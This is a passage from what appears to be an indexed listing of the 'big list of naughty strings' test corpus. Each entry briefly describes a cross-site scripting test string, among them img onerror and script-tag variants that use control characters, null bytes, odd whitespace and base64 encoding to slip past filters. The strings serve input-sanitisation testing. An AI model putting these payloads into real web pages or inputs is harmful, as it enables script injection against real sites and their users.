\x0Donerror=javascript:alert(121)> ``` ```html "'><img src=xxx:x \x2Fonerror=javascript:alert(122)> ``` ```html "'><img src=xxx:x \x09onerror=javascript:alert(123)> ``` ```html "'><img src=xxx:x \x0Conerror=javascript:alert(124)> ``` ```html "'><img src=xxx:x \x00onerror=javascript:alert(125)> ``` ```html "'><img src=xxx:x \x27onerror=javascript:alert(126)> ``` ```html "'><img src=xxx:x \x20onerror=javascript:alert(127)> ``` -------------------------------- ### XSS Attempt with Null Byte in Image Source Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string uses a null byte within the 'src' attribute of an img tag to bypass filters and execute JavaScript. ```html <img \x00src=x onerror="alert(165)"> ``` -------------------------------- ### XSS Attempt with Invalid Characters in Body Tag Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript by using invalid characters within the 'onload' attribute of a body tag. ```html <BODY onload!#$%&()*~+-_.,:;?@[/|\^`=alert("220")> ``` -------------------------------- ### XSS via Image onerror Event Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Exploits the `onerror` event handler of an `<img>` tag. If the image source is invalid, the JavaScript in `onerror` will execute. ```html <img src=x onerror=alert(2) /> ``` -------------------------------- ### XSS via Escaped Angle Brackets and Null Bytes Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Tests XSS by using escaped angle brackets (`\x3C`, `\x00`) and null bytes within script tag definitions. This bypasses filters by altering the literal representation of the tag. ```html '`"><\x3Cscript>javascript:alert(32)</script> ``` ```html '`"><\x00script>javascript:alert(33)</script> ``` -------------------------------- ### XSS with Whitespace in Script Tags Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Tests the robustness of input sanitization against script tags that contain extraneous whitespace characters, which might bypass simple pattern matching. ```html < / script >< script >alert(8)< / script > ``` -------------------------------- ### Image Tag with onerror Event (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string attempts to trigger an XSS vulnerability through an image tag's onerror event. It tests if the onerror attribute is properly sanitized. ```html PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEyMykgLz4= ```